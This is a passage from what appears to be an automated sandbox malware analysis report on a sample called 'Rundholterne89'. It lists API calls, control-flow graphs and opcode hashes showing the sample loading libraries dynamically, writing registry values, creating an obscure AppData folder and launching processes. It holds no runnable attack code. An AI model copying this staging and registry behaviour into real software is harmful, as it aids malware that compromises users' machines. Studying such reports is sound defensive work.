                                                                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                            • Instruction ID: 4a41e99441af98314081ed165e1285c49616552a54b2ccacd5bb7637226e5887
                                                                                            • Opcode Fuzzy Hash: 22b2b84ea6fcd6b14ed9c5c60211004c3ca56765c3c02eadf23789df00b13e66
                                                                                            • Instruction Fuzzy Hash: 76216271A44108BFEB12AFB0C94AAAD7B75DB44308F14807EF541B61D1D6B885419B29

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 805 401f90-401f9c 806 401fa2-401fb8 call 402a3a * 2 805->806 807 402057-402059 805->807 816 401fc7-401fd5 LoadLibraryExA 806->816 817 401fba-401fc5 GetModuleHandleA 806->817 808 4021c4-4021c9 call 401423 807->808 814 4028cf-4028de 808->814 819 401fd7-401fe4 GetProcAddress 816->819 820 402050-402052 816->820 817->816 817->819 822 402023-402028 call 404f48 819->822 823 401fe6-401fec 819->823 820->808 828 40202d-402030 822->828 824 402005-402021 823->824 825 401fee-401ffa call 401423 823->825 824->828 825->828 836 401ffc-402003 825->836 828->814 829 402036-40203e call 40364f 828->829 829->814 835 402044-40204b FreeLibrary 829->835 835->814 836->828
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FBB
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,774D23A0), ref: 00404FA4
                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 2987980305-0
                                                                                            • Opcode ID: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                                            • Instruction ID: 2138191ccfc75e686ed6e38fe7ddd30e16a5f0053d2c4fe6557c99b01bfc6870
                                                                                            • Opcode Fuzzy Hash: c898cda39f6fe508cb32d8ec84f6dafc54057451f4acf75246eee6ddcced1586
                                                                                            • Instruction Fuzzy Hash: 58212B72904211EBDF217F658E4CAAE3671AB45318F30423BF701B62D0D7BC4946D66E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 837 402364-4023aa call 402b2f call 402a3a * 2 RegCreateKeyExA 844 4023b0-4023b8 837->844 845 4028cf-4028de 837->845 847 4023c8-4023cb 844->847 848 4023ba-4023c7 call 402a3a lstrlenA 844->848 851 4023db-4023de 847->851 852 4023cd-4023da call 402a1d 847->852 848->847 854 4023e0-4023ea call 402e9f 851->854 855 4023ef-402403 RegSetValueExA 851->855 852->851 854->855 859 402405 855->859 860 402408-4024de RegCloseKey 855->860 859->860 860->845
                                                                                            APIs
                                                                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023A2
                                                                                            • lstrlenA.KERNEL32(00409C10,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C2
                                                                                            • RegSetValueExA.ADVAPI32(?,?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023FB
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateValuelstrlen
                                                                                            • String ID:
                                                                                            • API String ID: 1356686001-0
                                                                                            • Opcode ID: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                                            • Instruction ID: f509f4240a3e10e7eaa3df5a693eb391f4e90e3bb863c7dbc5285fb3648b227d
                                                                                            • Opcode Fuzzy Hash: af2b45bfcb0136edb290ca19ee121481d5b6a55bc37b0262ae4d3dbc08afb77b
                                                                                            • Instruction Fuzzy Hash: 6B117571E00108BFEB10EBA5DE89EAF767DEB54358F10403AF605B71D1D6B85D419B28
                                                                                            APIs
                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(?,?,0042AC70,?,004058A6,0042AC70,0042AC70,774D3410,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,774D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405848
                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 0040584D
                                                                                              • Part of subcall function 0040583A: CharNextA.USER32(00000000), ref: 00405861
                                                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                                                                                              • Part of subcall function 0040540E: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian,00000000,00000000,000000F0), ref: 00401634
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 00401629
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                            • String ID: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian
                                                                                            • API String ID: 1892508949-2640575136
                                                                                            • Opcode ID: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
                                                                                            • Instruction ID: add3044d5edc1dd1b42d505c238b4ff4158083b6ff7b93d5c81ca089004ad06d
                                                                                            • Opcode Fuzzy Hash: e0a1c47591656d94ff2a999c71ce0e1ab37baa92c7ea8d4027b9740f46afb8e4
                                                                                            • Instruction Fuzzy Hash: C7112736504141ABEF217B650C415BF37B4EAA6325738463FE592B22E2C63C4943A63F
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 00404EEB
                                                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00404F3C
                                                                                              • Part of subcall function 00403F60: SendMessageA.USER32(00010494,00000000,00000000,00000000), ref: 00403F72
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                            • String ID:
                                                                                            • API String ID: 3748168415-3916222277
                                                                                            • Opcode ID: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                            • Instruction ID: 2a78fc1f4cbdadc5126368fc20cebde0bfb6f5e986cb98bc8d814c8ad8ef1b08
                                                                                            • Opcode Fuzzy Hash: 44c7124f25b7d0e2ad082f453cfb3c7493e33a8b49738481f167c29b071f4aa1
                                                                                            • Instruction Fuzzy Hash: 6D01F7B150420AAFEF20AF51DE80A5B3766E7C4751F284037FB00762D0C3799C51966D
                                                                                            APIs
                                                                                            • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                            • CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                            Strings
                                                                                            • Error launching installer, xrefs: 004054D3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcess
                                                                                            • String ID: Error launching installer
                                                                                            • API String ID: 3712363035-66219284
                                                                                            • Opcode ID: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                            • Instruction ID: eccce0787fa873eefbebbfab998d1c477025fc2f998d9ab7e00b955d4b23de72
                                                                                            • Opcode Fuzzy Hash: 47fe2490e17a7e9d962cab7a6b56508ed3a0dd8216b7049c1380fae9186fb834
                                                                                            • Instruction Fuzzy Hash: 99E0BFB4A00209BFEB119B64ED05F7B7BACE700704F408561BD11F2190E774A8559A79
                                                                                            APIs
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000,?), ref: 00404F81
                                                                                              • Part of subcall function 00404F48: lstrlenA.KERNEL32(00402FFA,00429048,00000000,0041C205,774D23A0,?,?,?,?,?,?,?,?,?,00402FFA,00000000), ref: 00404F91
                                                                                              • Part of subcall function 00404F48: lstrcatA.KERNEL32(00429048,00402FFA,00402FFA,00429048,00000000,0041C205,774D23A0), ref: 00404FA4
                                                                                              • Part of subcall function 00404F48: SetWindowTextA.USER32(00429048,00429048), ref: 00404FB6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FDC
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FF6
                                                                                              • Part of subcall function 00404F48: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405004
                                                                                              • Part of subcall function 004054C0: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042B070,Error launching installer), ref: 004054E9
                                                                                              • Part of subcall function 004054C0: CloseHandle.KERNEL32(?), ref: 004054F6
                                                                                            • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
                                                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
                                                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                            • String ID:
                                                                                            • API String ID: 3521207402-0
                                                                                            • Opcode ID: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
                                                                                            • Instruction ID: 17c2ba3ee0df36fac51d80065c7f5b12f0089491b6a7036ff5f4409f8054ee18
                                                                                            • Opcode Fuzzy Hash: fa6371b051929d11490b6b0237e04c3ddcee680ab82e9b2704d90c07df1b053f
                                                                                            • Instruction Fuzzy Hash: 3A014031904114EBEF11AFA1CD8999F7B76EF00358F10817BF601B62E1C7795A419B9A
                                                                                            APIs
                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                            • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
                                                                                            • RegCloseKey.ADVAPI32(?,?,?,00409C10,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3677997916-0
                                                                                            • Opcode ID: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
                                                                                            • Instruction ID: 7890893f0b843e6db6fa7552cbbd45c8f95600c1d4b4a320ca67a90271c7f2f1
                                                                                            • Opcode Fuzzy Hash: ec8dd42a2d0ea345b8cd5bbdd5168a1da3feeb0db291650b5b2d283f8041d553
                                                                                            • Instruction Fuzzy Hash: 4511A771905205EFDF14DF64CA889AEBBB4EF15348F20443FE542B72C0D2B84A45DB6A
                                                                                            APIs
                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                            • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                            • Instruction ID: 5e1477e87fe007c5129b9736e49814af818948606251066a5de5a0362d6646fb
                                                                                            • Opcode Fuzzy Hash: f3c75b006a08d566646381a99556231751fdd45880b457440c556b6d1843a041
                                                                                            • Instruction Fuzzy Hash: DC012831B242109BE7295B389C04B6A369CE710319F51863BF811F72F1D678EC02CB4D
                                                                                            APIs
                                                                                              • Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                                                                            • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402330
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseDeleteOpenValue
                                                                                            • String ID:
                                                                                            • API String ID: 849931509-0
                                                                                            • Opcode ID: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
                                                                                            • Instruction ID: 0b5ea08ab0382a988395d3fa8ff755f3119953e7a6b53afab80e2150babb3da0
                                                                                            • Opcode Fuzzy Hash: 0df6b1a3f6ceee7d43e4221d77fb77a885781458b791b3427230b76ffe70b956
                                                                                            • Instruction Fuzzy Hash: E9F04433A00110ABEB10BBA48A4EAAE72699B54344F14443BF201B71C1D9BD4D12966D
                                                                                            APIs
                                                                                            • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A16
                                                                                            • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A29
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1402358709.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1402334549.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402388682.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402408602.0000000000440000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000442000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.1402530784.0000000000452000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_Rundholterne89.jbxd
                                                                                            Similarity
                                                                                            • API ID: EnvironmentExpandStringslstrcmp
                                                                                            • String ID:
                                                                                            • API String ID: 1938659011-0
                                                                                            • Opcode ID: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
                                                                                            • Instruction ID: c697d808c4e59c81b2ccde1a948b82941deecacae3b345ad39c5db03ab9efa89
                                                                                            • Opcode Fuzzy Hash: 8d5237d9befea95f927a2a949abdd38ff93adcf4596b0f884109541de8077415
